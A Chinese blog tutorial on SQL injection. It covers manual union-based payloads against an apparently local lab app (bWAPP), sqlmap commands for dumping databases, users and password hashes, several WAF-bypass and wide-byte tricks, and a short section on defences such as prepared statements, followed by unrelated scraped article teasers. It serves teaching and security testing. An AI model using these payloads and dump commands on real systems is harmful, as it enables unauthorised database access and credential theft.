文章目录

  • SQL注入使用总结
    • 一:SQL注入的原理
      • 1:什么是SQL
      • 2:SQL注入的原理
      • 3:SQL注入分类
    • 二:手工注入
      • 1:判断是否存在注入(三步走)
      • 2:判断字段长度
      • 3:判断显示字段的位置
      • 4:暴库——显示数据库内的内容和信息
      • 5:爆表——查看数据库内的数据表信息
      • 6:爆字段——查看表中的内容
      • 7:爆字段内容
    • 三:SQLmap的使用
      • 1:基本使用方法
        • <1>:确定目标
          • ①单个目标网址,使用 **-u** ,对单一网址进行扫描
          • ② 多个目标的扫描,使用 **-m** 对指定文本文件中所有URL进行扫描(文本文件即txt文件)
          • ③ 可以将一个HTTP请求保存在文件中,然后使用参数 -r 加载该文件,Sqlmap会解析该文件,从该文件分析目标并进行测试
          • ④使用 -l 从burp代理的日志中解析目标
        • <2>:发起请求实施注入(涉及到的指令稍多)
          • ①:最常用的命令
          • ②:进阶操作和注入技巧
    • 四:SQL注入绕过姿势
      • 1:关键字嵌套,大小写绕过
      • 2:各种编码(对关键字编码)
      • 3:注释
      • 4:关键字替换
      • 5:等价函数绕过
      • 6:宽字节的注入
    • 五:防止SQL注入的方法
      • 1:过滤危险字符
      • 2:使用预编译语句

版权声明:本文为博主原创文章,欢迎转载,请注明出处: https://me.csdn.net/qq_41880069

SQL注入使用总结

一:SQL注入的原理

1:什么是SQL

SQL,指结构化查询语言,作用:访问和处理数据库
也就是说SQL语言的所有操作都是作用于数据库的,那我们的SQL注入的目的就显而易见了,即进入后台数据库,对后台数据库进行查看甚至是修改

2:SQL注入的原理

SQL命令插入到 Web表单递交 输入域名 页面请求 的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

3:SQL注入分类

  • 根据字符类型分类:①整型注入②字符型注入③宽字节注入
  • 注入方法分类:①报错注入②延时注入③布尔型盲注④联合查询注入⑤多语句执行注入

光看理论有些抽象,明白就可,具体看下面注入操作

二:手工注入

1:判断是否存在注入(三步走)

判断是否存在注入,关键看是否出现页面报错信息,如若报错证明其执行了你填写的SQL语句,此时便可以进入下一步

  • 给参数赋值单引号,查看页面变化
  • 给参数赋值为and 1=1或or1=1,查看页面变化
  • 给参数赋值为and 1=2或or1=2,查看页面变化
    如若页面出现变化,说明该Web页面存在SQL注入,若没有出现变化,可能没有SQL注入,也可能有但需要特殊的方法绕过
    例:在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2:判断字段长度

通过使用order by语句来判断后台所查询字段的数目

  • 给参数赋值 order by (num),num为测试的数:1,2,3,… 当页面出错时,正确显示页面的最后一个num便为后台所查询字段的数目总数
    例:
    在这里插入图片描述
    在这里插入图片描述

3:判断显示字段的位置

通过联合查询(union select 字段数)查看可显示字段,此操作的目的通过查看显示位为下一步暴库(显示数据库内信息)做准备
例:
在这里插入图片描述
图中payload构造时在union select前加了and1=2,目的是直接显示联合查询的结果,屏蔽其他信息,不屏蔽也是可以的,不过联合查询的信息会在页面显示的其他信息之后

4:暴库——显示数据库内的内容和信息

通过联合查询用上一步已知的显示位查看我们想要知道的信息,例如:用户名,数据库名,版本信息等
例:
payload的如下

http://192.168.(省略)?title=%27and%201=2%20union%20select%201,user(),database(),version(),5,6,7%23

在这里插入图片描述
显示位显示了payload对应的内容
接下来我们可以使用如下的payload查看所有数据库的名称
注:MySQL 5.0之后有增加了系统表information_schema,可从其中查询所需信息


http://192.168.(省略)?title=%27and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7 from information_schema.SCHEMATA limit 0,4%23

例:
在这里插入图片描述
limit后面的两个数字,第一个为从第几个数据库开始显示,第二个数字为一次性显示几个,这里注意数据库的其实编号是从0开始的

5:爆表——查看数据库内的数据表信息

使用如下的payload可以显示当前数据库内的数据表信息了


http://192.168.(省略)?title=%27and 1=2 union select 1,2,TABLE_NAME,4,5,6,7 from information_schema.TABLES where TABLE_SCHEMA=database()%23

例:
在这里插入图片描述

6:爆字段——查看表中的内容

使用如下的payload查看数据表中的内容

  • payload: ’ and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME= ‘已经查出的表名’
http://192.168.(省略)?title=' and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME= '已经查出的表名'

最后的 ‘已查到的表名’‘’ 不可省略

  • payload: ’ and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=16进制的表名
http://192.168.(省略)?title=' and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=16进制的表名

此时已查出的表名 不用加 ‘’ ,但是一定要用16进制。例: users 要 改为 0x7573657273

  • 例:
    在这里插入图片描述

7:爆字段内容

使用如下payload:

'and 1=2 Union select 1,2,字段名,4,5,6,7 from 表名 limit 0,1

可以查看字段内容
例:
在这里插入图片描述
喜欢记得点赞关注哦,持续更新中

三:SQLmap的使用

1:基本使用方法

建议大家将SQLmap升级到最新使用,升级命令:SQLmap --update,大家如果使用的是Kali的话还可以看我的Kali升级教程,升级系统和所有软件,点击查看:2018最新Kali升级教程

<1>:确定目标

①单个目标网址,使用 -u ,对单一网址进行扫描

例:sqlmap “目标网址”(当目标网址需要登录时还需要带上自己登录的cookie信息)
此时命令为:sqlmap “目标网址” --cookie "你的cookie信息"

sqlmap -u "http://192.168.(省略)?title='" --cookie "PHPSESSID=e09a1a07b94dfdde9944206326ad80d8; security_level=0"

cookie信息的获取:查看页面信息–>在控制台输入document.cookie–>回车后就是你的cookie信息
例:

② 多个目标的扫描,使用 -m 对指定文本文件中所有URL进行扫描(文本文件即txt文件)

例:SQLmap -m “1.txt”
而1.txt文件的内容是:
http://192.168.43.247:8080/otype.asp?classid=2
http://192.168.43.247:8080/onews.asp?id=17
http://192.168.43.247:8080/onews.asp?id=53

③ 可以将一个HTTP请求保存在文件中,然后使用参数 -r 加载该文件,Sqlmap会解析该文件,从该文件分析目标并进行测试

例:sqlmap -r desktop/1.txt (先将HTTP请求保存在文件中,这里是1.txt)

④使用 -l 从burp代理的日志中解析目标

<2>:发起请求实施注入(涉及到的指令稍多)

①:最常用的命令
  • --level=LEVEL:执行测试的等级(1-5,默认为1)
    例:--level=3
  • -p:指定要测试的参数
    例:-p “id,user-agent”
  • --dbs:查询有哪些数据库
    查询结果举例:
    all databases
  • --current-db:查看当前数据库
  • --current-user:查看当前用户
  • --tables:查询某个数据库(需用 -D 指明)下有哪些表
    例:-D BWAPP --tables
    在这里插入图片描述
  • --users:列出数据库的所有用户
    执行示例:
    在这里插入图片描述
  • --passwords:列出数据库用户的密码(加密时列出的是密码的hash值)
  • --columns:查看某个表下的所有列名 (先指明库名和表名)
    例:-D BWAPP -T users --columns
    在这里插入图片描述
  • –dump:导出表项,即列对应的内容
    例:-D BWAPP -T users -C password --dump
    在这里插入图片描述
  • --dump -all:导出所有表项
    例:-D BWAPP -T users -C(指定列名)password --dump
②:进阶操作和注入技巧
  • --cookie:cookie注入,当level大于2时自动检测cookie是否存在注入漏洞
    例:
    sqlmap -u "http://192.168.(省略)?title=’ --cookie “PHPSESSID=e09a1 a07b94d
    fdde9944206326ad80d8; security_level=0”
  • –sql-shell:运行自定义语句
    例:
    先执行sqlmap -u “url”–cookie “cookie信息” --sql-shell
    后面在**sql-shell>**下执行自定义SQL语句
    在这里插入图片描述
  • -b, –banner 获取数据库管理系统的标识
  • post注入:--data
    该参数指定的数据会被作为POST数据提交,Sqlmap也会检测该参数指定数据是否存在注入漏洞
    例:sqlmap -u “http://www.target.com/vuln.php” --data=“id=0&name=admin”
  • --delay:设置延迟,默认没有延迟
    例:--delay 1.5 表示延迟1.5 秒
    过于频繁地发送请求可能会被网站察觉甚至引起网站奔溃
  • --proxy:设置格式是“http(s): //url:port”
  • --tamper:修改注入数据(重点) 绕过waf的关键
    例:sqlmap -u"http://www.target.com/vuln.php" --tamper “example.py”
    --tamper后面跟脚本文件,在SQLmap的tamper/目录中有许多可用的tamper脚本。tamper脚本的作用是对payload进行混淆达到绕过waf的目的。常见的脚本文件对应的功能——点击查看--temper脚本文件对应功能
    当我们自己会写脚本去绕过时,SQLmap就真正掌握了
    对于其他指令,想要了解查看的使用指令 sqlmap -h,便可查看

四:SQL注入绕过姿势

1:关键字嵌套,大小写绕过

  • 例:union ==> UNIunionO

2:各种编码(对关键字编码)

  • URL编码 例如:# 对应的编码为 %23
  • 16进制编码 例如:users 对应的编码为 0x7573657273 (有很多在线转换网站)
  • ASCII编码
  • Unicode编码
  • 双重编码
  • 还有8进制,utf-32,utf-16 等等

3:注释

常见的注释方法有:

  • 末尾注释:#,%23,–,--+
  • /**/ 注释: 在构造得查询语句中插入注释,规避对空格的依赖或关键字识别
    例如:union/**/select,and/**/1=1
    若注释“/**/”不能绕过,可以尝试用“%0b”代替“/**/”
  • 内联注释 :/*! 要执行的code*/
    例如:id=1/*!UnIoN*/SeLeCT
  • " 注释,用于闭合SQL语句中的引号

4:关键字替换

  • 空格替换:/**/,%a0,()
  • and替换:&&
  • or替换:||
  • =替换:<,>,like , rlike
  • 引号替换:用16进制编码

5:等价函数绕过

  • hex()、bin() ==> ascii()
  • sleep() ==>benchmark()
  • concat_ws()==>group_concat()
  • mid()、substr() ==> substring()
  • @@user ==> user()
  • @@datadir ==> datadir()
    举例:substring()和substr()无法使用时:
    ?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 
    或者:
  • substr((select ‘password’),1,1) = 0x70
  • strcmp(left(‘password’,1), 0x69) = 1
  • strcmp(left(‘password’,1), 0x70) = 0
  • strcmp(left(‘password’,1), 0x71) = -1
    还有一些绕过脚本,在上面的--temper参数中都有介绍,可以点击查看temper脚本绕过

6:宽字节的注入

过滤 ’ 的时候往往利用的思路是将 ’ 转换为 \’ 。

在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:

(1)去掉 \ 具体的方法是 urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(’)符号在外面:

id=-1%df%27union select 1,user(),3–+

(2)将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数:

  • 1.replace():过滤 ’ \ ,将 ’ 转化为 ’ ,将 \ 转为 \,将 " 转为 " 。用思路一。

  • 2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:’ , " , \ 。用思路一
    (防御此漏洞,要将 mysql_query 设置为 binary 的方式)

  • 3.mysql_real_escape_string():转义下列字符:
    \x00 \n \r \ ’ " \x1a

(防御,将mysql设置为gbk即可)

五:防止SQL注入的方法

1:过滤危险字符

类似于“#,–,||,= ” 等等 常用于攻击的字符都要过滤

2:使用预编译语句

使用PDO语句,不将变量拼接到PDO语句中,而使用占位符进行数据库的增,删,改,查。
(PDO需要PHP5核心OO特性的支持,所以它无法运行于之前的PHP版本。在PHP5.1版本及后面的版本,PDO和PDO SQLITE已经包含在了此发行版中。)

查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. JBPM-工作流引擎

    一、 工作流 工作流(Workflow):就是“业务过程的部分或整体在计算机应用环境下的自动化” l 简单的说,就是将工作的流程通过程序管理起来,以表单审核和任务办理为主体,实现办公自动化工作流帮助程序管理业务流程,业务操作不发生改变,工作流只是通知程序,该哪个角色进…...

    2024/4/20 18:21:13
  2. 趣头条自媒体怎么创造爆文内容、趣头条五个爆文技巧教

    趣头条怎么创造爆文内容、趣头条五个爆文技巧教1、一个视频或者一篇文章,能被评论并传播的因素通常有:性搞笑的、喜剧戏剧性= 骇人听闻的,重大事故,以及类似的一些可爱的= 小孩子、宠物等最新的游戏、电影、秀等2、为你的文章或者视频取一个好名字(网络致富)——烂名(网上赚…...

    2024/4/21 8:53:11
  3. blend关于透明度的弊端和其alphatest的取舍

    首先需要说明的是,计算机在渲染一个模型的时候,并不存在什么混合模式可以选择,这个会对我们开发游戏的过程带来一个麻烦。比如:如果一个模型有两层,最终渲染出来结果是前面一层挡住了了后面一层,各位看官可能会觉得挡住就挡住啊,反正看不见,可是当前面一层是带透明度的…...

    2024/4/21 8:53:10
  4. SQL学习收获与心得

    SQL或结构化查询语言是一种语言,旨在允许技术和非技术用户查询,操作和转换关系数据库中的数据。由于其简单性,SQL数据库为数百万个网站和移动应用程序提供安全且可扩展的存储。有许多流行的SQL数据库,包括MySQL,MSSQL和Oracle 等等。所有这些都支持通用的SQL语言标准,这…...

    2024/4/26 11:57:53
  5. 【Activiti工作流引擎】官方快速入门demo

    Activiti官方快速入门demo地址: https://www.activiti.org/quick-start0. 版本activiti 5.22.0 JDK 1.81. 介绍这个快速入门指南用于介绍如何在你编写的应用程序中嵌入BPM(Business Process Management)框架Activiti,你可以构建一个基于命令行的BPMN(业务流程建模与标注)逻辑…...

    2024/4/27 22:31:22
  6. Unity Shader Alpha混合 Blending

    Alpha Blending,中文译作Alpha混合Blending就是控制透明的。处于光栅化的最后阶段。这里例如我们给一个模型贴一个材质,那么在某个点计算出来颜色值称为源,而该点之前累积的颜色值,叫目标。语法Blend Off 不混合Blend SrcFactor DstFactor SrcFactor是源系数,DstFact…...

    2024/4/21 8:53:07
  7. SQL(基础查询)、SQL(关联查询)

    1. SQL(基础查询) 1.1. 基本查询语句 1.1.1. FROM子句 SQL查询语句的语法如下:copytextpop-upSELECT <*, column [alias], …> FROM table; SELECT <*, column [alias], …> FROM table;其中:SELECT用于指定要查询的列,FROM指定要从哪个表中查询。如果要查询所有…...

    2024/4/21 8:53:06
  8. VC中MessageBox与AfxMessageBox用法与区别

    一、MessageBox()用法 1、函数原型 Messagebox函数在Win32 API和MFC里的定义有区别。 Win32 API的定义如下:int WINAPI MessageBox(HWND hWnd, // handle of owner windowLPCTSTR lpText, // address of text in message boxLPCTSTR lpCaption, // address of ti…...

    2024/4/27 22:54:28
  9. 游戏系统开发笔记(三)——通用代码库

    墨水比较有限,工作时基本也都是着眼小处,除了工作内容涉及过的几个模块,其余的暂时并未多作关注,所以基本上还只是停留在感性认识上。不过我倒觉得这是难免,毕竟游戏产品放到整个软件行业来说也是个较复杂的东西,需要花很多时间才能把其间各种技术融会贯通为我所用,但等…...

    2024/4/21 8:53:04
  10. C++builder继承TGraphicControl类

    继承TGraphicControl类产生一个新画布,画面具有自绘保持功能。相当于画板控件。 .hpp文件内容如下:#ifndef __MYGRIPHIC #define __MYGRIPHIC class TMyGraphic : public TGraphicControl {public:__fastcall TMyGraphic(TComponent* AOwner);void __fastcall Paint(void);…...

    2024/4/21 8:53:03
  11. SQL ——窗口函数简介

    目录1、窗口函数的描述2、窗口函数中的元素2.1、分区2.2、排序2.3、框架3、支持窗口函数的查询元素4、窗口函数类别4.1、排名函数4.2、分布函数4.3、偏移函数1、窗口函数的描述窗口函数作用于一个数据行集合。窗口是标准的SQL术语,用来描述SQL语句内OVER子句划定的内容,这个内…...

    2024/4/21 8:53:02
  12. C#控制台简单魔塔小游戏

    using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; using System.IO; using System.Threading; using System.Collections.Generic; using System.Threading; namespace 简单程序__20180817__1 { #region…...

    2024/4/28 1:29:06
  13. 在WinCE下绘制半透的效果要注意的问题

    在Windows XP 中实现半透明效果并不是件难事,仅仅只需要调SetLayeredWindowAttributes函数即可。如果同样的效果也想在Windows CE 中重现呢?因为Windows CE没有SetLayeredWindowAttributes 函数,不过在Windows CE 5.0开始支持AlphaBlend,该函数的作用是将两个HDC根据一定的比…...

    2024/4/28 2:19:51
  14. 基于状态模式的简单工作流实现

    **欢迎关注公众号****微信扫一扫**工作流技术(Workflow) 是工作流程的计算模型,即将工作流程中的工作如何前后组织在一起的逻辑和规则在计算机中以恰当的模型进行表示,并对其实施计算。工作流要解决的主要问题是:为实现某个业务目标,在多个参与者之间,利用计算机,按某种…...

    2024/4/21 8:52:59
  15. 关于sql和MySQL的语句执行顺序(必看!!!)

    今天遇到一个问题就是mysql中insert into 和update以及delete语句中能使用as别名吗?目前还在查看,但是在查阅资料时发现了一些有益的知识,给大家分享一下,就是关于sql以及MySQL语句执行顺序:sql和mysql执行顺序,发现内部机制是一样的。最大区别是在别名的引用上。 一、s…...

    2024/4/20 9:11:27
  16. VS2010/MFC 中MessageBox函数显示变量的用法(显示数字、字符串)

    在VS2010/MFC中明显感觉到MessageBox()的用法和VC6.0不一样了。 今天用到了MessageBox()函数的时候,用VC6.0的方式貌似行不通的说, 各种尝试之后,找到了一种显示变量的比较简单的方式,共享一下。//VS/MFC中MessageBox用法//(1)、弹出数字CString msg;msg.Format(_T("…...

    2024/4/21 8:52:57
  17. 《大富翁8》中智力问答的题目、答案

    去了一次现金流俱乐部,回来想想还是拿《大富翁8》练练手,当夜就熬到3点,最后以破产告终。还是觉得这个游戏有些弱智,不过比较适合几个朋友或者男女朋友之间娱乐之用,还是有些意思。其中的一些问答对于我们这些richman的非忠实玩家来说还是有些难度,网上搜了题目和答案,附…...

    2024/4/24 11:37:46
  18. SQL - 单引号和双引号的区别

    原文转载至:SQL中的单引号和双引号有区别吗?在标准 SQL 中,字符串使用的是单引号。 如果字符串本身也包括单引号,则使用两个单引号(注意,不是双引号,字符串中的双引号不需要另外转义)。 但在其它的数据库中可能存在对 SQL 的扩展,比如在 MySQL 中允许使用单引号和双引…...

    2024/4/20 18:21:20
  19. GDI绘制png

    最近做的一个项目,用GDI+来做绘制,最后发现效率很慢,和GDI的效率相差不止一个数量级。 最后决定还是用GDI来绘制。 问题很快出现了,以前的很多效果是带alpha透明的png来贴图实现的,这用GDI+很容易做到,但是用GDI就很麻烦了。 我想了一个折中的办法,是这样做的:用GDI+把…...

    2024/4/20 10:00:53
  20. C#中,messagebox 用法大全,珍藏!

    我们在程序中经常会用到MessageBox, MessageBox.Show()共有21中重载方法。现将其常见用法总结如下: 1.MessageBox.Show("Hello~~~~");最简单的,只显示提示信息。2.MessageBox.Show("There are something wrong!","ERROR");可以给消息框加上标…...

    2024/4/20 1:43:09

最新文章

  1. 网络工程师----第十八天

    45、工作区子系统中的通信布线规范有哪些? ①信息插座距离地面30cm~ 50cm ②信息插座与电源插座的间距不小于10cm ③安装信息插座与旁边的电源插座应保持20cm的距离④信息插座到网卡的距离最长10m 46、综合布线中线路施工规范有哪些? ①电缆铺设前&#xff0c;应做外观及导…...

    2024/4/28 2:41:04
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/3/20 10:50:27
  3. 【干货】零售商的商品规划策略

    商品规划&#xff0c;无疑是零售业的生命之源&#xff0c;是推动业务腾飞的强大引擎。一个精心策划的商品规划策略&#xff0c;不仅能帮助零售商在激烈的市场竞争中稳固立足&#xff0c;更能精准捕捉客户需求&#xff0c;实现利润最大化。以下&#xff0c;我们将深入探讨零售商…...

    2024/4/26 15:55:51
  4. 一场人生的风险控制,商业社会识人指南

    一、资料前言 本套社会识人资料&#xff0c;大小679.94M&#xff0c;共有37个文件。 二、资料目录 识人的终极目的&#xff1a;一整场人生的风险控制.pdf 信任的搭建&#xff1a;更多的时间与维度.pdf 没有搞不定的人&#xff01;角色人格与全面人格.pdf 政治不正确的正确…...

    2024/4/22 12:25:15
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/4/26 18:09:39
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/4/26 20:12:18
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/4/26 23:05:52
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/4/27 4:00:35
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/4/27 17:58:04
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/4/27 14:22:49
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/4/28 1:28:33
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/4/27 9:01:45
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/4/27 17:59:30
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/4/25 18:39:16
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/4/28 1:34:08
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/4/26 19:03:37
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/4/28 1:22:35
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/4/25 18:39:14
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/4/26 23:04:58
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/4/27 23:24:42
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/4/25 18:39:00
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/4/26 19:46:12
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/4/27 11:43:08
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/4/27 8:32:30
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
